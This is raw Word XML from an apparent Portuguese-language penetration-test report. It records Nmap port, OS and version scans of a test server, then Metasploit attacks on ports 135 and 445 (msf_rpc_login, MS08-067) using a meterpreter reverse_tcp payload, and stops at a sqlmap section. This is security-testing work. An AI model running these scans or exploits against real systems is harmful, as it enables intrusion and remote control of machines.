          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e as versões dos sistemas que essas portas rodavam no momento do escaneamento.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Resultados: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E01CAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Passou no teste. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conforme a Figura 5 foi possível escanear as portas abertas e identificar a versão dos sistemas que estavam rodando nelas.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C624EB" w:rsidRDefault="00C624EB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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3616325"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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5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Figura 5 - Portas escaneadas e versões dos sistemas que elas estavam rodando.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751591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color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Serviços: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5B3078" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta </w:t>
      </w:r>
      <w:r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">semelhante ao TeamViewer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">que conecta o computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Microsoft Windows microsoft-ds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta que auxilia a implantação de imagens em uma distribuição Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRPr="00D62225" w:rsidRDefault="008A79EE" w:rsidP="00D62225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Tentativa 4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>Utilização do comando  nmap -sU -O IP_do_servidor.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19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“-sU” permite que a ferramenta utilize o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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“-O” permite que a ferramenta tente encontrar o sistema operacional rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="002C52C4" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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 w:rsidRPr="002C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IP_do_servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> informa</w:t>
      </w:r>
      <w:r w:rsidRPr="002C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> o IP onde está hospedada a aplicação em teste.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E01CAE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2112"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir as portas UDP abertas, e as versões dos sistemas que essas portas rodavam no momento do escaneamento.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Resultado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F05851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conforme a Figura 6, foi possível identificar as portas UDP abertas e os serviços que elas estavam rodando no momento do escaneamento.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.</w:t>
      </w:r>
      <w:r w:rsidR="00C624EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5667375" cy="3793490"/>
            <wp:effectExtent l="0" t="0" r="9525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6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Figura 6 - Portas UDP escaneadas e serviços que estavam rodando nelas no momento do escaneamento.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D62225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Serviços:</w:t>
      </w:r>
      <w:r w:rsidR="00D62225" w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincronização de relógios usando UDP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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r w:rsidRPr="00E15301">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>netbios-ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - responsável pelo registro de nomes de aplicação do NetBios [4]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00174603" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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r w:rsidRPr="00E15301">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>netbios -dgm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - serviço de datagrams do NetBios ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15301">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> [5] - gerenciamento de redes;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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microsoft-ds - protocolo windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L2TP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de encapsulamento de camada 2, para criar redes vpn privadas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F6948" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>nat-t-like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de tradução de ips.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84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Tentativa 5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>Utilização do comando nmap -A -O IP_do_servidor.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20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“-A” é para usar o </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tracerout</w:t>
      </w:r>
      <w:r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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“-O” permite que a ferramenta tente encontrar o sistema operacional rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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IP_do_servidor informa o IP onde está hospedada a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aplicação em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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E01CAE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2112"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir a rota traçada pelo Tracerouter.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A79EE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Resultado: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. Conforme as Figura 7 e 8, foi possível identificar a rota traçada pelo Tracerouter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRDefault="008A79EE" w:rsidP="008A79EE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A79EE" w:rsidRDefault="00C624EB" w:rsidP="00C624EB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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="373951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7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Figura 7 - Rota traçada pelo Tracerouter - Parte 1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C624EB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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="375856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8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Figura 8 - Rota traçada pelo Tracerouter - Parte 2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Tentativa 6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>Utilização do comando nmap -sV -p 1-65535 -O IP_do_servidor.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21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“-sV” permite que a ferramenta realize o SYN e buscar a versão do software  rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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“-p” indica quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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“-O” permite que a ferramenta tente encontrar o S.O. rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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IP_do_servidor é o IP onde está hospedada a aplicação em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006876BB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Pr="006876BB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7D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir a versão dos softwares que estavam rodando nas portas escaneadas.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Resultado: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. Conforme a Figura 9, foi possível identificar a versão dos softwares que estavam rodando nas portas escaneadas.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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5676900" cy="3851275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9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Figura 9 -  Versão do software rodando nas portas escaneadas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Tentativa 7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>Utilização do comando nmap -sU -p 1-65535 IP_do_servidor.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22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“-sU” permite que a ferramenta use o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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“-O” permite que a ferramenta tente encontrar o sistema operacional rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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IP_do_servidor é o IP onde está hospedada a aplicação em teste.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Pr="006876BB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7D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir a versão dos softwares que estavam rodando nas portas UDP escaneadas.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Resultado: </w:t>
      </w:r>
      <w:r w:rsidRPr="006876BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Passou no teste. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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EC5D2B" w:rsidRDefault="00EC5D2B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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5705475" cy="4083685"/>
            <wp:effectExtent l="0" t="0" r="9525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0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Default="008C6DC7" w:rsidP="00EC5D2B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Figura 10 - Versão do software rodando nas portas UDP escaneadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="008A79EE" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B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000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F6982" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6982">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ataque à porta RPC - via Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="006F6982" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1821"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="2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dia 10/04/16.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Duração: 1 hora.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Objetivo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Ataque à porta RPC descoberta na análise de servidor via Nmap realizada anteriormente.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Tentar se conectar à porta 135 usando o framework Metasploit para tentar conseguir privilégios dentro do Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00751591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Resultados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Tentativa 1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Tentar configurar algum exploit que ataque a porta 135.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Resultado: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">A ferramenta </w:t>
      </w:r>
      <w:r w:rsidRPr="00174603">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">é de difícil configuração e possui documentação muito ruim para iniciantes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não foi possível obter grandes resultados.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Tentativa 2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7D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">O exploit escolhido para testar o caso específico da porta RPC foi o </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>auxiliary/scanner/msf/msf_rpc_login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> O payload a ser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> executado é o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP.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O exploit foi enviado mas não trouxe resultado. Após verificação, </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>foi constatado que o exploit é voltado pra Windows NT.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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Tentativa 3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Tentar atacar a porta 445 usando exploits automatizados.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Para esse caso, o exploit escolhido foi o MS08-67 disponível no caminho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">/windows/smb/ms08_067_netapi. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ele serve especificamente para explorar uma vulnerabilidade do </w:t>
      </w:r>
      <w:r w:rsidRPr="000D3326">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>microsoft ds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. O payload é o utilizado na tentativa 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP.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>: Passou no teste.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751591" w:rsidRPr="00751591" w:rsidRDefault="008C6DC7" w:rsidP="00751591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Tentativa 4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Tentar atacar a porta 135.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O exploit escolhido foi o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>auxiliary/scanner/msf/msf_rpc_login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  para testar o caso específico da porta RPC escolhida. O payload a ser executado é o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591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751591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  <w:sz w:val="24"/>
          <w:szCs w:val="28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>: Passou no teste.</w:t>
      </w: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ind w:left="1416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="0070782B" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.3  Tela de Login – Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416" w:firstLine="708"/>
